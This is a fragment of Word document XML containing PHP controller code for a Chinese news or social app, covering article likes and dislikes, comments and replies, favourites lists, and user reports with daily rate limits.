    <w:p w14:paraId="2F54A8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5DCF0B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'f_uid' =&gt; 'require|number',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF587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5BF0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2A261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'f_uid' =&gt; $f_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F5F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B9B9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1A1987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071E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0CD619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0CA603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E547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07D0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50DDBB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($this-&gt;memberId == $f_uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657361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166CB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D36E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$where['f_uid'] = $f_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41361A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53A08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Db::name('member_fangke')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E8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455379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E5FEA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$db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF0C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623C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FB00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F5BD2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70B937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0C9702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35E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D61C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1C1D63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zancai()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8CBD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412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input('param.aid/d') ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267107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input('param.type/d', ''); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048844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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC083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6FBB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47731F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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B2C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'require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442929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3C78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CDED3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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B552C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5D96B4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884D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7D10D0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91706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536936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064E6A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641A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4688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0CFEF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 Db::name('article_zan')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D97F0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($zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F504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($zan['zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA95F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您已经赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED30F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211DE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您已经踩过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428343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BC73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8B5FC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$text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895D7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4766F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11FC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40806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($type == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E223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$where['zan'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877B0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$ziduan = 'zan';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB92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($type == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B208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$where['cai'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E23C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$ziduan = 'cai';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B6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61BA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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E407B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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF3B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5B19B2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$where['aid_uid'] = Db::name('article')-&gt;where('id', $aid)-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1E6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Db::name('article_zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72368C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1C2F8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 =&gt; $aid])-&gt;setInc($ziduan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC10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BAF0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 =&gt; $db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4F9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3ADA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8ED85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B1F8E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64A003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69C00E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F8EB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6559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2680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2621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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D032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3F1B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input('param.aid/d') ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11051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input('param.content', '', 'strip_tags') ? input('param.content', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1AAD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 = input('param.pingId/d') ? input('param.pingId/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197951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$pingId2 = input('param.pingId2/d') ? input('param.pingId2/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48D1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2A89E0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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CFE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 =&gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6662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'pingId2' =&gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED88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A983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212766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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8E46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 =&gt; $pingId,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E80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'pingId2' =&gt; $pingId2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF6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15B9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627FED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0D832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610A03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83BCC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10F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2D57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458C70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 = Db::name('article_ping')-&gt;whereTime('time', 'today')-&gt;where(['uid' =&gt; $uid])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C067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 &gt; 100) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58E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C74B4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发布失败，每日发布评论限制</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B40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7A4A7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720C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35DA4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(!$pingId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69EC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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9EA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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD2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06BE7F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 = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55256A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$where['aid_uid'] = Db::name('article')-&gt;where('id', $aid)-&gt;cache(true)-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771F6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Db::name('article_ping')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F837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12676C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 =&gt; $aid])-&gt;setInc('pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD6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A75AD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$db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92A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852F9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2327A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5945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66FDF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38FBD8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B0AA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82A5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30AF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$ping_uid = db::name('article_ping')-&gt;where(['id' =&gt; $pingId])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC65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$where['ping_id'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC361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$where['ping_uid'] = $ping_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882E4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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B26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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BCA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4B032F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($pingId2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C1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$pingId2 = db::name('article_ping_xia')-&gt;where(['id' =&gt; $pingId2])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068DEA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_user($pingId2['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5911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 = $content . '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0308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864D6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 = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79D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A0FE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Db::name('article_ping_xia')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4296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49E1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0FBE5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$db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACC8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9AE2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DF5B9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6D34F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639D39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1C489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E086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81C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CD5B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3AED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A7B9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pingZan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73B6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250B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input('param.aid/d') ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025C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745E2C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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD38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F6E9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077706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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C379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ABCDF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3ADAD9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8DEC8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15C279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0B1E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62B4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A3A7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4D4C8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$zan = Db::name('article_ping_zan')-&gt;where(['pingId' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E57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($zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DE83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474A2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您已经赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AE8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310E4A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44A6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0C340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$where['zan'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F9B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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D9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$where['pingId'] = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B609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04E202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Db::name('article_ping_zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73D1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0F4A6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Db::name('article_ping')-&gt;where(['id' =&gt; $aid])-&gt;setInc('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342743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146AE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$db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAB59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82B0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FC13F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3B3E3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17200D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3ACBF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38F6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5CB7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F1A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DAC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pingZan_xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21148F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DF77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input('param.aid/d') ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F8A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44B28B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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A66A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4B0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68B6D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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48D0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6212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5B7391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BA1B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052CA2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C624E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6D74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13C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5ECACF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$zan = Db::name('article_ping_xia_zan')-&gt;where(['pingId' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25852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($zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F878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72D9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您已经赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29B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37BBAD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FE7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D20CE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$where['zan'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F7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$where['uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF76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$where['pingId'] = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9945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0C0A4D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Db::name('article_ping_xia_zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257A9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80BD9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Db::name('article_ping_xia')-&gt;where(['id' =&gt; $aid])-&gt;setInc('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD46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77F7C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$db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DEE5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1F9A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180F9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BE86C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7E98D0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774A4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0CB42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C958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4DC5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A895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zanList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779F4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A6CF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input('param.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166821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3CFD3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46FAC4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4EE1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620F8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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E46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EA61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2F9C1A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2A53A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67CB51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7DFB05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16F1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4C1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331AFE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$where['w.uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE6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174C89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['__ARTICLE_PING__ w', 'a.pingId=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4459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2E62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Db::name('article_ping_zan')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.uid,w.content,a.pingId,w.aid,a.time')-&gt;order('a.time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417954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66B171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4060A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5770D3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1E7A9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 = date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAE4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A935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4788D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38BF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pingList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BC0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C05F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input('param.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516C2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$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152636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760BDA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C814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9BC6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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B298C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0B90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1AB289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E5BD7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3473BF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578B2E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7B02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1814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31D6E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$where['ping_uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97F8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Db::name('article_ping_xia')-&gt;where($where)-&gt;order('time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26EA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72000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05B78D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6DBF9D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6AFF2C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 = date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF6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$data['data'][$k]['contentPing'] = db::name('article_ping')-&gt;where(['id' =&gt; $v['ping_id']])-&gt;value('content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C91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75F1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1D0AB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4305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shoucangList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F71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13D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input('param.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D8E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input('param.type/d', '');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6D6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C29C2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29154D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'in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314944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CCB8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62CDD6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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB045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$type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E752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21A6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15F544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D48C7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6C12FD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2F822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EA13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0D8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1B6BBD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$where['a.uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E8D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$where['a.type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965D6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12D2EB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['__ARTICLE__ w', 'a.aid=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097C7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C3A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config()['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C1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 = Db::name('member_favorite')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('w.id,w.title,w.description,w.mychannel,w.image,w.create_time,w.source,w.pingNum,w.images,w.videodate,w.uid,w.click,w.weitoutiao,w.zan,w.video,w.qiniu_video_type,content')-&gt;order('a.time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E4C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193B2C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&amp;&amp; $v['mychannel'] != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37B2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_imgUrl() . $v['image'] . "?imageView2/1/w/172/h/120";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D344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8F6EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E10D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_imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA0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7886F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1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38200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FDABC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_imgUrl() . '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D70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250A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1857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E3DD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$data['data'][$k]['create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE5A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($v['weitoutiao'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D28D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$kuandu = "?imageView2/1/w/180/h/124";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45899A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2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B025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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33042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$data['data'][$k]['pcList'] = json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525C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'&lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v['image'] . '?imageView2/1/w/400/h/280" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76734E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08CB2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json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACA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$images['0']['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B6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'&lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $images . '?imageView2/1/w/400/h/280" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB74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E7A12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 = $images . '&lt;em class="aui-iconfont aui-icon-image"&gt; ' . count(json_decode($v['images'], true)) . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/em&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C149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($v['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB372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083388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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15C7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$data['data'][$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84C5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$data['data'][$k]['user']['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429501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$data['data'][$k]['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E5E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4FC1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$data['data'][$k]['video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8C3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($v['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24669B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preg_match_all("/img(.*?)src=\"(.*?)\"/", $v['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5739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($img[2] as $ka =&gt; $va) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204141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(strstr($va, 'http')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027B2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$va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDF6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(strpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9794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$config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A55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13EEF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$contet[] = _imgUrl() . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666B4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D160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CE75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$data['data'][$k]['imagesArticleList'] = $contet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687DE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E1BA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EC552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$data['data'][$k]['description'] = _substr($v['description'], 100, '&lt;a&gt;...[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D1F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($v['mychannel'] == 3 || $v['video']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09880E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($v['qiniu_video_type']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43986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 . $v['video'] . '?vframe/jpg/offset/2/w/200/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D316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81A46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($v['image']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73198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 . $v['image'] . '?imageView2/1/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3513FD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AE77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 . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C380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046B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9999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 = $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AFF9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206F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$kuandu = "?imageView2/1/w/200/h/200";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF548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 = json_decode(htmlspecialchars_decode($v['images']), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8F1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($data['data'][$k]['images']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEB2F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$imagesPro = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D6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($data['data'][$k]['images'] as $ks =&gt; $vsa) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9127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(count($data['data'][$k]['images']) == 1 || count($data['data'][$k]['images']) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A33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$col = "aui-col-xs-6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD9E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C667F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$col = "aui-col-xs-4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33435C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36A5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(is_array($vsa)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D832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$vsa = $vsa['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DDB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EF4F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$imagesPro[] = _imgUrl() . $vsa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C63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 .= '&lt;div class="' . $col . '" tapmode onclick="img(' . $v['id'] . ',' . $ks . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $vsa . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258A6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F25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 = $images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9E8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$data['data'][$k]['imagesPro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AA0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0DE3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EE87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 ($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1F7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14F01A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($user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2658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$data['data'][$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C258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$data['data'][$k]['user']['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1758B6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650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$data['data'][$k]['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B716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A4AA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28F9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count($data['data'][$k]['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD0C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E684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6388DF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EEAE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jubao()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239662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588D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input('param.aid/d') ? input('param.aid/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D9C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input('param.content', '', 'strip_tags') ? input('param.content', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AF53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461A0B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=&gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042B4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'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D99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B7E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57E08C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$content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A9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4BD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77A488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E260D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14E64C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210E6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77B6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9624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$ip = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0668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(!$ip) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBB5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4AE4A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'IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地区异常</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F1E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5144D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0056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F6B4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4D763B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db::name('jubao')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE05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9C006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6BE6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您已经举报过啦</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AD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24EF5B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D9CDE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0643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$jianzhi = Db::name('jubao')-&gt;where(['ip' =&gt; $ip])-&gt;whereTime('time', 'today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49666B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($jianzhi &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A9F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F87B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$jianzhi = Db::name('jubao')-&gt;where(['uid' =&gt; $uid])-&gt;whereTime('time', 'today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4D4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($jianzhi &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017357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json([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41006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为防止恶意攻击，举报或反馈每天不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条，请明天再来举报或反馈</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D44D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13A51C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48B1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DB85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6398D9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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2F4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 = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05DE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 = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FC4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$where['ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24978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Db::name('jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
